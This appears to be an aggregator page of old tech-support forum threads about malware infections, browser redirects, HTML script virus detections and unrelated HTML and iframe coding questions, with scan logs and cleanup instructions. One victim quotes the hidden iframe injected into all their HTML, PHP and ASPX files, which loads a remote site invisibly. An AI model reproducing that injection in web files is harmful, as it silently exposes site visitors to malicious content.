Avast finds some Trojans running in my C:\Windows\Temp\ and C:\Users\(comp name)\AppData\Local\Temp folders pretty much every day. Also my browser gets redirected to a diff website when i click on a link (not the intended destination), back and retry clicking sends me to the right location. i am using firefox.I could not get GMER to work properly all choices were grayed out in the scan except for:ServicesRegistryFiles C:\ADSi ran scan anyway, and nothing was found.when i launch GMER i get a popup stating:"C:\Windows\system32\config\system: The system cannot find the file specified."I am posting a Hijack this log at the end just for good measure.Here is my dds log:DDS (Ver_10-03-17.01) - NTFSX64 Run by MIKE at 15:49:01.27 on Thu 09/02/2010Internet Explorer: 8.0.7600.16385Microsoft Windows 7 Home Premium 6.1.7600.0.1252.1.1033.18.3582.1901 [GMT -4:00]============== Running Processes ===============C:\Windows\system32\wininit.exeC:\Windows\system32\lsm.exeC:\Windows\system32\svchost.exe -k DcomLaunchC:\Windows\system32\nvvsvc.exeC:\Windows\system32\svchost.exe -k RPCSSc:\Program Files\Microsoft Security Essentials\MsMpEng.exeC:\Windows\system32\atiesrxx.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestrictedC:\Windows\System32\svchost.exe -k Local... Read more

A:browser redirected/ avast finds: "HTML:IFrame-U [Trj]" , "JS:Pdfka-gen [Expl]" , "Win32:rootkit-gen [Rtk]...

Hi Tizac, and welcome to Bleeping Computer.Download OTL.exe by OldTimer to your Desktop.Close all windows and double click OTL.exe.In the "Custom Scans/Fixes" window (under the light green bar) paste the following in bold:netsvcsdrivers32 %SYSTEMDRIVE%\*.*%systemroot%\*. /mp /sCREATERESTOREPOINTHKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AUHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\Results\Install|LastSuccessTime /rsClick Run Scan and let the program run uninterrupted.When the scan completes, it will open two Notepad windows. OTL.Txt and Extras.Txt. These are saved in the same location as OTL. Post both logs in this thread.You may need to use two posts to get it all.

Read other 9 answers
RELEVANCY SCORE 55.2

Hi Guys,

I have a problem with my computer.
looks i have a virus/malware inside my computer. I have to try to restore using system restore, seems i doesn't work.

This kind of <iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe> infected all of my HTML/PHP/ASPX files in my computer.
I had to try to delete it using notepad, but when i open it again. it still there.

Can sombody please help me, cause i still had a lot of work must be finished monday, and i can't continue to work if my computer still behave like this.

Here is log file using DDS i created to you guys. Thanks for your help

A:<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.If you have already posted a DDS log, please do so again, as your situation may have changed.Use the 'Add Reply' and add the new log to this thread.Thanks and again sorry for the delay.We need to see some information about what is happening in your machine. Please perform the following scan:Download DDS by sUBs from one of the following links. Save it to your desktop.DDS.comDDS.scrDDS.pifDouble click on the DDS icon, allow it to run.A small box will open, with an explaination about the tool. No input is needed, the scan is running.Notepad will open with the resul... Read more

Read other 2 answers
RELEVANCY SCORE 49.6

Hello,My Avira keeps finding daily everytime I scan it.....HTML/Exploit.Mhtml HTML and HTML/Infected.WebPage.Gen HTML script viruses. This has been going on a long time. The only thing I have noticed is high cpu 90-100% in task manager all the time, which does'nt seem to impact the speed of the computer. Occasionally, I pick up things in Malwarebytes and Spybot if I neglect to run a scan on Avira for a few days. I've also scanned Adaware and Avast but nothing shows up on them. This has been driving me nuts and any help would be greatly appreciated!!Logfile of Trend Micro HijackThis v2.0.2Scan saved at 2:13:12 AM, on 8/8/2009Platform: Windows XP SP3 (WinNT 5.01.2600)MSIE: Internet Explorer v7.00 (7.00.5730.0013)Boot mode: NormalRunning processes:C:\WINDOWS\System32\smss.exeC:\WINDOWS\system32\winlogon.exeC:\WINDOWS\system32\services.exeC:\WINDOWS\system32\lsass.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\System32\svchost.exeC:\WINDOWS\Explorer.EXEC:\PROGRA~1\A4Tech\Keyboard\Ikeymain.exeC:\Program Files\ASUS\Probe\AsusProb.exeC:\Program Files\Spybot - Search & Destroy\TeaTimer.exeC:\WINDOWS\system32\ctfmon.exeC:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exeC:\PROGRA~1\KEYWAL~1\KWallet.exeC:\WINDOWS\system32\spoolsv.exeC:\... Read more

A:HTML/Exploit.Mhtml HTML & HTML/Infected.WebPage.Gen HTML

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.If you have already posted a DDS log, please do so again, as your situation may have changed.Use the 'Add Reply' and add the new log to this thread.Thanks and again sorry for the delay.We need to see some information about what is happening in your machine. Please perform the following scan:Download DDS by sUBs from one of the following links. Save it to your desktop.DDS.scrDDS.pifDouble click on the DDS icon, allow it to run.A small box will open, with an explaination about the tool. No input is needed, the scan is running.Notepad will open with the results.Foll... Read more

Read other 14 answers
RELEVANCY SCORE 40

Outlook keeps popping up two download boxes whenever I get email with attachments or that is in HTML format. I played with the trust center to see if I could turn this feature off, but it still pops up every time I open an email from Facebook or from a friend with an attachment in it.

Any ideas?
 

A:Outlook - download on HTML files when email containing HTML is received

Can you post a screen shot of these "pop ups"?
 

Read other 2 answers
RELEVANCY SCORE 40

I'm currently designing a table based website in Dreamweaver, but am having a problem importing a drop down menu in the form of html. It gives me the error "The selected file is not the correct format. Please select a file which was exported from Fireworks".

The problem with this is that all the export options have been set correctly, and is being exported as Dreamweaver HTML, and obviously being exported from Fireworks - so what's the problem? Does anyone have an answer to my problem?
 

Read other answers
RELEVANCY SCORE 39.6

Good morning all, (at least here in EST) Im not sure if this is the proper forum, so ill see if it dies here before I try to post somewhere else.
Every Month, i need to send in a report on what i have done here at work (read: justify my existence). It generally takes me about an hour to do. What i would like to do is to create a HTML form, formatted the way they want it, with text boxes/pulldown menus, and fill in my information, and have the completed form either A)saved as an html form without the boxes; IE:the information gets added into the actual html OR B) All the information gets pushed into a word.doc.
Ultimately, i would like to have it save with something like this "Report-{date or month}.html (or doc).
Soooo, this being said, any of you code wizards out there know how to do this? Thanks alot for any imput you can give.
 

A:HTML forms ->send to word/html document?

Cmon! somebody has to know something! {tap tap tap} is this thing on??
(guess whos bored at work)
 

Read other 2 answers
RELEVANCY SCORE 39.6

When saving an html document to any location e.g.; the
desktop the correct icon for an HTML document
does not appear (white page with blue 'e') ,all i get
is a default icon (white background with an Windows flag).

Right clicking and selecting 'properties' to change the icon is
not available as Change Button is greyed out.

Double clicking the file does open IE6 correctly.
Interestingly shortcuts to HTML sites do have the correct
icon.

Reinstalling IE6 has not fixed the fault.

Any help?
 

A:missing icon for HTML documents; htm and html files

Directions for changing the icon for HTML files.

Open any folder.
Hit View->Folder options.
Choose the 'File Types' tab.
Find 'HTML Document' and click on it.
Click on 'edit'.
Click on 'change icon'.Find a good icon to use and close all the windows.
Shortcuts are a different type of file according to the computer, so it handles them differently.
 

Read other 3 answers
RELEVANCY SCORE 39.6

Hi all,

I have created a JApplet and I have applied that to my web page. Now I want to know how to navigate from that web page to another web page using the "OK" JButton in my JApplet. I have no idea about how to do this. Please help me..please..
 

A:Solved: JAVA: Navigating from one HTML to another HTML using JButton

Solved...
 

Read other 1 answers
RELEVANCY SCORE 39.6

I am using Windows XP SP3.

I am trying to add an "edit" action to the .html file type. I have .html associated with Firefox. I go to Tools>Folder Options>File Types> and .html isn't even listed! (Nor is .htm) So I click "New" and add the .html file type. Then I click "Advanced" and fill in the action info and hit "OK". Then I hit "Close".

It doesn't work, and then when I go back into "File Types", html is not listed anymore. Basically, Windows is ignoring my attempts to add the .html file type.

I created the .xxx file type and added actions to open with Firefox and Word. It worked perfectly.

So what is it with the .html file type that Windows won't create it or list it?
 

Read other answers
RELEVANCY SCORE 39.6

Hi all,
My problem started a few weeks ago! I caught a Virus and Dr. Web got rid of it as well as some trojan downloaders that Malwarebytes killed.
The virus ruined my Avast as well as Google Chrome - so I installed Avira and Zone Alarm Firewall as well as ZA Forcefield browser. Avira continues to tell me I have a virus and quarantines it. I contacted Avira and they say it looks like a Zone Alarm problem - I contacted ZA - and am still waiting - I also uploaded these to Avira to be checked for a false positive and have not heard back from them either.
I was wondering - if I still have a problem or if this is a false positive?
Here is what Avira's log says on the last catch:
Avira AntiVir Personal
Report file date: Thursday, December 23, 2010 18:30

Scanning for 2292269 virus strains and unwanted programs.

The program is running as an unrestricted full version.
Online services are available:

Licensee : Avira AntiVir Personal - FREE Antivirus
Serial number : 0000149996-ADJIE-0000001
Platform : Windows 7 x64
Windows version : (plain) [6.1.7600]
Boot mode : Normally booted
Username : SYSTEM
Computer name : TAMHBRIH-PC

Version information:
BUILD.DAT : 10.0.0.609 31824 Bytes 12/13/2010 09:43:00
AVSCAN.EXE : 10.0.3.5 435368 Bytes 12/8/2010 12:49:25
AVSCAN.DLL : 10.0.3.0 46440 Bytes 4/1/2010 20:57:04
LUKE.DLL : 10.0.3.2 104296 Bytes 12/8/2010 12:49:28
LUKERES.DLL : 10.0.0.1 1264... Read more

A:HTML/Infected.WebPage.Gen HTML script virus

A common attack against the web infrastructure can be the infection of harmless web pages. Some malware changes every HTML file stored on the disc and adds a link (very often an IFrame) to a site hosting malicious code. Other attacks can aim for the web servers and try to insert forwarding to the pages hosted there. The owner of these pages is advised to take them offline. Fix the hole (either on his own PC or on the server), check the pages for infections, clean them and go online again. Infected Web Pages often contain additional Iframe, Object or Script Tags. The Script Tags often contain encrypted Code.Special detection HTML/Infected.WebPage.GenSince Avira is making the detection and you submitted samples, I suggest you wait on a reply from them or follow up by contacting them again with a reminder.See this Avira link for a discussion of a similar report.

Read other 4 answers
RELEVANCY SCORE 38.8

Hi,

I have a problem with HTML popups that are driving me crazy.
Is there anyone that can help solve this problem?
I have noticed that some other people have had similar problems
with muon.html or tau.html popups, and I have read them, but
understand that these problems have to be handled carefully.

My HiJackThis log is given below:

Logfile of HijackThis v1.99.1
Scan saved at 00:59:08, on 2006-04-30
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
C:\Program Files\Common Files\Symantec Shared\SNDSrvc.exe
C:\Program Files\Common Files\Symantec Shared\SPBBC\SPBBCSvc.exe
C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\WINDOWS\system32\rundll32.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\SOUNDMAN.EXE
C:\Program Files\ewido anti-malware\ewidoctrl.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\QuickTime\qttask.exe
C:\Program Files\ewido anti-malware\ewidoguard.exe
C:\Program Files\Java\jre1.5.0_02\bin\jusched.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\Program Files\MUSICMATCH\MUSICMATCH Jukebox\mm_tray.exe
C:\Program Files\Common Files\Symantec Shared\ccApp.exe
C:\WINDOWS\system32\ctfmon.exe
C:... Read more

A:Problem with muon.html and tau.html popups

Please download Look2Me-Destroyer.exe to your desktop.

* Close all windows before continuing.
* Double-click Look2Me-Destroyer.exe to run it.
* Put a check next to Run this program as a task.
* You will receive a message saying Look2Me-Destroyer will close and re-open in approximately 10 seconds. Click OK
* When Look2Me-Destroyer re-opens, click the Scan for L2M button, your desktop icons will disappear, this is normal.
* Once it's done scanning, click the Remove L2M button.
* You will receive a Done Scanning message, click OK.
* When completed, you will receive this message: Done removing infected files! Look2Me-Destroyer will now shutdown your computer, click OK.
* Your computer will then shutdown.
* Turn your computer back on.
* Please post the contents of C:\Look2Me-Destroyer.txt and a new HiJackThis log.

If you receive a message from your firewall about this program accessing the internet please allow it.

If you receive a runtime error '339' please download MSWINSCK.OCX from the link below and place it in your C:\Windows\System32 Directory.
http://www.ascentive.com/support/new/images/lib/MSWINSCK.OCX
 

Read other 3 answers
RELEVANCY SCORE 38.8
Q: iframe

How do clear the iframe in netscape 7.0 and Internet explorer. The following code works in IE but not in netscape

<html>
<head>
<title>Simple Math Practice</title>


<script language="javascript" type="text/javascript">
<!-- Hide Script
function RandPosInt() {
Rnum = Math.round(Math.random()*8+1);
return Rnum;
}

function WriteHeader() {
problem.document.write('<html><head><link href="math.css" rel="stylesheet" type="text/css"><\/head><body>');
}

function WriteContent() {
problem.document.write("this is content");
}

function WriteFooter() {
problem.document.write("<\/body><\/html>");
}

function ClearFrame() {
problem.document.open();
problem.document.clear();
}

function CloseFrame() {
problem.document.close();
}


// End Hiding Script -->
</script>


<link href="math.css" rel="stylesheet" type="text/css">
</head>
<body>
<div align="center">
<h1>Simple Math Practice</h1>

<iframe
src="defaultframe.html" id="problem" name="problem" frameborder="1" marginwidth="10" marginheight="10" scrolling="no" align="top" height="200" width=&quo... Read more

A:iframe

That function is no longer supported. See here:
http://www.web-developer-india.com/web/jscript/refp_77.html
 

Read other 1 answers
RELEVANCY SCORE 38.8

I am working on a site using an IFrame. It is a copy of another site I have using the same IFrame. In the original site the homepage shows up on load but on the reworked site it loads the home page and then it disappears. I am using IE to view these pages.

A friend said he looked at the site in FireFox and it works correctly, so it leads me to believe it may be an IE thing but the original site works fine in IE.

I am out of ideas here. HELP!
 

A:IFrame help

post the sites url and I will check out the code....... if I can see it.

d.
 

Read other 2 answers